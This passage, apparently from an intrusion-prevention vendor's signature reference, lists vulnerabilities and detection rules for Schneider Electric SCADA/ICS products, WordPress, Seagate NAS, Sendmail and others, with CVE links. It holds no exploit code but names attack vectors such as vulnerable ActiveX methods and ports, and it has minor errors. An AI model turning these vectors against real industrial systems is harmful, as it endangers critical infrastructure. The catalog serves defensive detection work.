Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Schneider Electric IIoT. This vulnerability can be exploited remotely. Successful exploitation might lead in disclosure of file contents.
Situation: HTTP_CSU-Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal
References:
CVE-2018-7835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7835
Back to top

Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution

About this vulnerability: A Schneider Electric InduSoft Web Studio Remote Agent Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric
Type: Misconfiguration
Description: A vulnerability in Schneider Electric InduSoft Web Studio which allows remote attackers to execute arbitrary code due to the lack of authentication to the Remote Agent Service.
Situation: Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution
References:
CVE-2015-7374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7374
Back to top

Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840

About this vulnerability: A vulnerability in Schneider Electric InduSoft Web Studio
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Schneider Electric
Type: Buffer Overflow
Description: A stack buffer overflow in InduSoft Web Studio v8.1 and earlier allows unauthenticated remote code execution. InTouch Machine Edition 2017 v8.1 and earlier are also impacted by this vulnerability.
Situation: Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840
References:
CVE-2018-8840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8840
Back to top

Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow

About this vulnerability: A vulnerability in Interactive Graphical SCADA Systems
Risk: High
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: 7T Interactive Graphical SCADA System
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability Schneider Electric Interactive Graphical SCADA Systems, versions 9.x and 10.x, which allows remote attackers to execute arbitrary code due to an integer underflow that leads to a stack buffer overflow when processing specially crafted input sent to ports tcp/12397 and tcp/12399.
Situation: Generic_CS-Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow
References:
CVE-2013-0657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
Back to top

Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric SoMachine
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric
Type: Buffer Overflow
Description: A code execution vulnerability exists in multiple Schneider Electric products. The vulnerability is due to a stack buffer overflow in the RemoveParameter() method of the IsObjectModel.ModelObject.1 ActiveX control in isObjectModel.dll. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.
Situation: File-Text_Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow
References:
CVE-2014-9200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9200
BID-72335
http://www.securityfocus.com/bid/72335
OSVDB-117017
http://www.osvdb.org/117017
Back to top

Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric Modicon M340
Type: Input Validation
Description: There is a buffer overflow vulnerability in Schneider Electric Modicon M340 product line. A remote attacker can exploit this vulnerability by sending a malformed HTTP request to the vulnerable device. Successful exploitation can result in remote code execution or in a denial of service.
Situation: HTTP_CSH-Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability
References:
CVE-2015-7937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7937
Back to top

Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric Pelco DS-NVs
Risk: Moderate
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric Pelco DS-NVs
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Schneider Electric Pelco DS-NV Software package. The vulnerability is due to insufficient input validation on a user-supplied input in the SetText method before it is copied into a fixed length buffer on stack. A remote unauthenticated attacker can exploit this vulnerability by enticing the victim to open a file or visit a webpage. Successful exploitation could lead to code execution in the security context of the browser process.
Situation: File-Text_Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow
References:
CVE-2015-0982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0982
OSVDB-119304
http://www.osvdb.org/119304
Back to top

Schneider-Electric-Pelco-Endura-Encoder

About this vulnerability: A vulnerability in Schneider Electric Pelco Endura
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric
Type: Insecure Configuration
Description: A vulnerability in Schneider Electric Pelco Endura NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 version encoders prior to version 2.1.9.7 which allows remote attackers to enable the SSH service and change the root password.
Situation: HTTP_CRL-Schneider-Electric-Pelco-Endura-Encoder
References:
CVE-2019-6814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6814
Back to top

Schneider-Electric-PLC-ETY-Denial-Of-Service

About this vulnerability: A vulnerability in Schneider Electric ETY series telnet server allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric PLC ETY
Type: Malfunction
Description: A vulnerability exists in Schneider Electric ETY series telnet servers where an attacker can call a telnet instance from within an existing telnet instance which causes the device to crash.
Situation: Telnet_TC-Schneider-Electric-PLC-ETY-Denial-Of-Service
Back to top

Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to a heap buffer overflow when processing user supplied parameter input to SetHtmlFileName in the Atx45.ocx ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.
Situation: File-Text_Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow
References:
CVE-2014-8511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8511
OSVDB-116783
http://www.osvdb.org/116783
Back to top

Schneider-Electric-Proclima-F1bookview-Attach-Memory-Corruption

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: There exists a memory corruption vulnerability in Schneider Electric ProClima. A remote attacker can use this to acchieve arbitrary code execution in the affected system.
Situation: File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption
References:
CVE-2015-7918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7918
Back to top

Schneider-Electric-Proclima-F1bookview-Attachtoss-Memory-Corruption

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: A flaw in the AttachToSS() method of the F1BookView ActiveX control may cause memory corruption, which can be leveraged to allow remote code execution.
Situation: File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption
References:
CVE-2015-8561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8561
Back to top

Schneider-Electric-Proclima-F1bookview-Copyall-Memory-Corruption

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-719-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to a flaw in the CopyAll() method of the F1BookView ActiveX control, in which a user-supplied integer is interpreted as a memory address. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim user to browse to a malicious Web page. Successful exploitation could lead to arbitrary code execution under context of the user.
Situation: File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption
References:
CVE-2015-8561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8561
Back to top

Schneider-Electric-Proclima-F1bookview-Setvalidationrule-Memory-Corruption

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: There exists a memory corruption vulnerability in Schneider Electric ProClima. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption
References:
CVE-2015-7918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7918
Back to top

Schneider-Electric-Proclima-Metadraw-Arrangeobjects-Memory-Corruption

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: A code execution vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to the dereferencing of an attacker-supplied memory address by the MetaDraw ActiveX control's ArrangeObjects method. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.
Situation: File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities
References:
CVE-2014-9188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9188
OSVDB-116782
http://www.osvdb.org/116782
Back to top

Schneider-Electric-Proclima-Metadraw-ObjLinks-Remote-Code-Execution

About this vulnerability: A vulnerability in Schneider Electric ProClima
Risk: Moderate
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ProClima
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Schneider Electric ProClima. The issue is due to an input validation error when processing user supplied parameter input in the MDraw30.ocx ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.
Situation: File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities
References:
CVE-2014-8514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8514
OSVDB-116781
http://www.osvdb.org/116781
Back to top

Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass

About this vulnerability: A vulnerability in Schneider Electric ClearSCADA 2010
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ClearSCADA
Type: Input Validation
Description: An information disclosure vulnerability exists in Schneider Electric SCADA Expert ClearSCADA. This vulnerability is due to insufficient restrictions of the preconfigured guest account. A remote attacker can exploit this vulnerability to disclose sensitive system information.
Situation: Generic_CS-Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass
References:
CVE-2014-5412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5412
OSVDB-111239
http://www.osvdb.org/111239
Back to top

Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service

About this vulnerability: A vulnerability in Schneider Electric ClearSCADA 2010
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ClearSCADA
Type: Input Validation
Description: A denial of service vulnerability exists in Schneider Electric SCADA Expert ClearSCADA. The vulnerability is due to insufficient validation of incoming requests. A remote attacker can exploit this vulnerability by enticing an authenticated user to view crafted web content. This can result in a denial of service condition.
Situation: HTTP_CSU-Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service
References:
CVE-2014-5411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5411
OSVDB-111238
http://www.osvdb.org/111238
Back to top

Schneider-Electric-Somachine-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Schneider Electric SoMachine HVAC
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric SoMachine HVAC
Type: Input Validation
Description: The AxEditGrid ActiveX control of Schneider Electric SoMachine HVAC is vulnerable to an untrusted pointer dereference. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: File-Text_Schneider-Electric-Somachine-Hvac-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference
References:
CVE-2016-4529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4529
Back to top

Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection

About this vulnerability: A vulnerability in Schneider Electric Struxureware Data Center Expert
Risk: Moderate
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Platform: Generic
Software: Schneider Electric Struxureware Data Center Expert
Type: Input Validation
Description: There exists a command-injection vulnerability in Schneider Electric Struxureware Data Center Expert. Successful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection
References:
CVE-2021-22795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22795
Back to top

Schneider-Electric-Struxureware-Data-Center-Expert-Fwupd-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric Struxureware Data Center Expert
Risk: Moderate
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Generic
Software: Schneider Electric Struxureware Data Center Expert
Type: Directory Traversal
Description: Improper handling of user-supplied input causes a directory traversal vulnerability in Schneider Electric Struxureware Data Center Expert. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Schneider-Electric-Struxureware-Data-Center-Expert-Firmware-Update-Directory-Traversal
References:
CVE-2021-22794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22794
Back to top

Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion

About this vulnerability: A Schneider Electric U.motion Builder css.inc.php Arbitrary File Inclusion vulnerability
Risk: Moderate
First detected in: sgpkg-ips-935-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric U.motion Builder
Type: Directory Traversal
Description: A directory traversal vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and before, which allows remote attackers to obtain sensitive information by sending a malicious request to the server, due to improper input sanitization.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion
References:
CVE-2017-7974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7974
Back to top

Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection

About this vulnerability: A Schneider Electric U.motion Builder loadtemplate.php SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric U.motion Builder
Type: SQL Injection
Description: An SQL injection vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and prior, due to insufficient validation of the tpl parameter in the loadtemplate.php request, which allows remote attackers to execute arbitrary SQL commands.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection
References:
CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973
Back to top

Schneider-Electric-U.motion-Builder-Localize-SQL-Injection

About this vulnerability: A vulnerability in Schneider Electric U.motion Builder
Risk: Moderate
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric U.motion Builder
Type: Input Validation
Description: Insufficient validation of HTTP requests causes an SQL injection vulnerability in Schneider Electric U.motion Builder. Successful exploitation of the vulnerability allows an attacker to execute arbitrary SQL or possibly arbitrary code on the target system.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-Localize-SQL-Injection
References:
CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973
Back to top

Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection

About this vulnerability: A Schneider Electric U.motion Builder nfcserver.php SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric U.motion Builder
Type: SQL Injection
Description: A vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and before, which allows remote attackers to execute arbitrary SQL commands through the sessionid request parameter, due to insufficient validation.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection
References:
CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973
Back to top

Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal

About this vulnerability: A Schneider Electric U.motion Builder runscript.php Directory Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric U.motion Builder
Type: Directory Traversal
Description: A directory traversal vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and prior, which allows remote attackers to gain sensitive information by sending a crafted request, due to insufficient input validation to the runscript.php script.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal
References:
CVE-2017-7974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7974
Back to top

Schneider-Electric-U.motion-Builder-Track-SQL-Injection

About this vulnerability: A vulnerability in Schneider Electric U.motion Builder
Risk: Moderate
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric U.motion Builder
Type: Input Validation
Description: Insufficient validation of user input results in an SQL injection vulnerability in Schneider Electric U.motion Builder. A successful exploit allows an attacker to perform arbitrary SQL commands on the target system.
Situation: HTTP_CRL-Schneider-Electric-U.motion-Builder-Track-SQL-Injection
Back to top

Schneider-Electric-Unity-Pro-Denial-Of-Service

About this vulnerability: A vulnerability in Schneider Electric Unity Pro allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric Unity
Type: Malfunction
Description: A vulnerability exists in Schneider Electric Unity Pro where an attacker can send custom TCP packets causing a denial of service condition where sim.exe experiences memory corruption leading to process termination.
Situation: Generic_CS-Schneider-Electric-Unity-Pro-Denial-Of-Service
Back to top

Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric VAMPSET
Risk: Moderate
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric VAMPSET
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Schneider Electric VAMPSET software. The vulnerability is due to improper processing of specific parameters within CFG and DAT files of a COMTRADE record. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a maliciously crafted COMTRADE record. Successful exploitation could lead to attacker-controlled code execution.
Situation: File-TextId_Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow
References:
CVE-2014-8390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8390
OSVDB-120041
http://www.osvdb.org/120041
Back to top

Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service

About this vulnerability: A vulnerability in Schneider Electric Vijeo Web Gate Server allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric Vijeo Web Gate Server
Type: Malfunction
Description: A vulnerability exists in Schneider Electric Vijeo Web Gate Server allowing an attacker to cause a denial of service condition by sending specially crafted data to TCP port 80.
Situation: HTTP_CS-Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service
Back to top

Schneider-Electric-Vijeo-Web-Gate-Server-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric Viejo Web Gate Server
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric Vijeo Web Gate Server
Type: Malfunction
Description: There is a directory traversal vulnerability in Schneider Electric Vijeo Web Gate Server.
Situation: HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities
Back to top

Schneider-Electric-Web-Designer-ServerSimulator-RCE

About this vulnerability: A vulnerability in Schneider Electric Web Designer
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric Web Designer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Schneider Electric Web Designer which allows a remote attacker to run arbitrary code within the target system.
Situation: Generic_CS-Schneider-Electric-Web-Designer-ServerSimulator-RCE
Back to top

School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609

About this vulnerability: A vulnerability in School Management Pro WordPress plugin
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: WordPress
Type: Backdoor
Description: WordPress plugin School Management Pro premium versions before 9.9.7 were reported to include a backdoor. Unauthenticated attackers could use the backdoor to execute arbitrary PHP code.
Situation: HTTP_CRL-School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609
References:
CVE-2022-1609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
Back to top

Schweitzer-SEL-2032-Commands

About this vulnerability: Configuration commands related with Schweitzer SEL-2032 operation
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schweitzer SEL-2032
Type: Misconfiguration
Description: User commands related with Schweitzer SEL-2032 communication processor. Detecting these commands may indicate unauthorized access to configuration tools.
Situation: Telnet_CS-Schweitzer-SEL-2032-File-Upload
Telnet_CS-Schweitzer-SEL-2032-Status-Command
Telnet_CS-Schweitzer-SEL-2032-Session-Logout
Telnet_Schweitzer-SEL-2032-Access-Password-Disabled
Telnet_Schweitzer-SEL-2032-Change-Password
Telnet_Schweitzer-SEL-2032-View-Passwords-Attempt
Telnet_Schweitzer-SEL-2032-Access-Attempt
Telnet_Schweitzer-SEL-2032-Device-Poll-All
Telnet_Schweitzer-SEL-2032-Point-Not-Available
Telnet_Schweitzer-SEL-2032-Failed-Configuration-Change
Telnet_Schweitzer-SEL-2032-Port-Configuration-Change
Telnet_Schweitzer-SEL-2032-Failed-Time-Change
Telnet_Schweitzer-SEL-2032-Time-Change
Telnet_Schweitzer-SEL-2032-IP-Address-Change
Telnet_Schweitzer-SEL-2032-Access-Denied
Telnet_Schweitzer-SEL-2032-Successful-Login
Telnet_Schweitzer-SEL-2032-Modem-Status-Changed
Telnet_Schweitzer-SEL-2032-Successful-Configuration-Change
Back to top

Script-In-HTTP-POST

About this vulnerability: A script was detected in a HTTP POST request
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: A script was detected in a HTTP POST request. This is not necessarily malicious, but may be unwanted in some environments.
Situation: HTTP_CS-Script-In-HTTP-POST
Back to top

Script-Self-Reference

About this vulnerability: A script with a self refence
Risk: Moderate
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Javascript Injection
Description: Most web browsers contain an embedded scripting interpreter, such as JavaScript or Visual Basic Script. The interpreter allows a script to access the environment where is script is running, including the running script itself. This allows the script to modify itself at runtime, possibly hiding the real activity.
Situation: HTTP_SS-JavaScript-Self-Reference
File-Text_JavaScript-Self-Reference
Back to top

Script-Tag-In-URI

About this vulnerability: A script tag was found in an URI
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Cross-site Scripting
Description: A script tag was found in an URI. This may be an attempted cross-site scripting attack.
Back to top

Seagate-Business-NAS-Remote-Code-Execution

About this vulnerability: A Seagate Business NAS Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Seagate Business NAS
Type: Insecure Configuration
Description: A vulnerability in Seagate Business NAS, within the language parameter of the CodeIgniter session cookie, which allows un-authenticated users to decrypt a cookie using a known static encryption key, modify the PHP object string, and re-encrypt, allowing local file uploads and command execution. Associated CVEs CVE-2014-8686 and CVE-2014-8687.
Situation: HTTP_CS-Seagate-Business-NAS-Remote-Code-Execution
References:
CVE-2014-8684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8684
Back to top

SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities

About this vulnerability: A vulnerability in SearchBlox
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SearchBlox
Type: Input Validation
Description: There exists multiple authentication bypass vulnerabilities in SearchBlox. A remote attacker can use this to acchieve a denial of service condition.
Situation: HTTP_CS-SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities
References:
CVE-2015-7919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7919
BID-78552
http://www.securityfocus.com/bid/78552
Back to top

Searchmyrequest

About this vulnerability: SearchMyRequest
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SearchMyRequest
Type: Code Injection
Description: SearchMyRequest is a Troijan that hijacks Internet Explorer and directs the user to unwanted sites.
Situation: HTTP_CSH-Searchmyrequest
Back to top

Security-Management-Center-Failed-Login

About this vulnerability: A brute-force attack against Security Management Server was detected
Risk: High
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A brute-force attack against Security Management Server (SMC) has been detected.
Situation: HTTP_SLS-Security-Management-Center-Failed-Login
Back to top

Sednit-Exploit-Kit

About this vulnerability: Sednit Exploit Kit
Risk: High
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Sednit is an exploit kit which has been known to be used in infiltrating government and military targets.
Situation: File-Text_Sednit-Exploit-Kit-Landing-Page
Back to top

Selenium-Chrome-RCE

About this vulnerability: A vulnerability in Selenium Grid
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Linux
Software: Selenium Grid
Type: Input Validation
Description: A vulnerability in Selenium Grid, versions before 4.0.0-alpha-7, allows remote attackers to execute arbitrary code through non-JSON content types.
Situation: HTTP_CS-Selenium-Chrome-RCE
References:
CVE-2022-28108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28108
Back to top

Self-Signed-Certificate-With-Default-Values

About this vulnerability: A self-signed certificate with default values was detected
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A self-signed certificate with default values was detected. The certificate with these default values is used by some malware families like Emotet. Setting the action of this situation blocking in your policy may lead into legit traffic termination.
Situation: TLS_SS-Self-Signed-Certificate-With-Default-Values
Back to top

Sendmail-Etrn-DoS

About this vulnerability: Sendmail ETRN Denial of Service
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sendmail
Type: Malfunction
Description: The Sendmail daemon sleeps 5 seconds for each ETRN command received. Therefore, multiple ETRN commands can lead to denial of service.
Situation: SMTP_Etrn-Sendmail-DoS
References:
CVE-1999-1109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1109
BID-904
http://www.securityfocus.com/bid/904
Back to top

Sendmail-Mime-BOF

About this vulnerability: Sendmail MIME Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux; BSD
Software: Sendmail
Type: Buffer Overflow
Description: Sendmail contains a buffer overflow vulnerability in the MIME handling that could be exploited to gain a complete system control.
Situation: SMTP_Sendmail-Mime-BOF
References:
CVE-1999-0047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0047
BID-685
http://www.securityfocus.com/bid/685
Back to top

Serendipity-FrontPage-SQL-Injection

About this vulnerability: SQL injection vulnerability in S9Y Serendipity
Risk: High
First detected in: sgpkg-ips-160-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: S9Y Serendipity
Type: SQL Injection
Description: There is an SQL injection vulnerability in S9Y Serendipity, web logging (blogging) software written in the PHP scripting language. The software fails to sanitize the user-supplied data which allows injection of SQL commands and may lead to system compromise.
Situation: HTTP_CRL-Serendipity-FrontPage-SQL-Injection
References:
CVE-2007-1326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1326
BID-22774
http://www.securityfocus.com/bid/22774
OSVDB-34935
http://www.osvdb.org/34935
Back to top

Serv-U-FTP-Server-Command-Buffer-Overflow

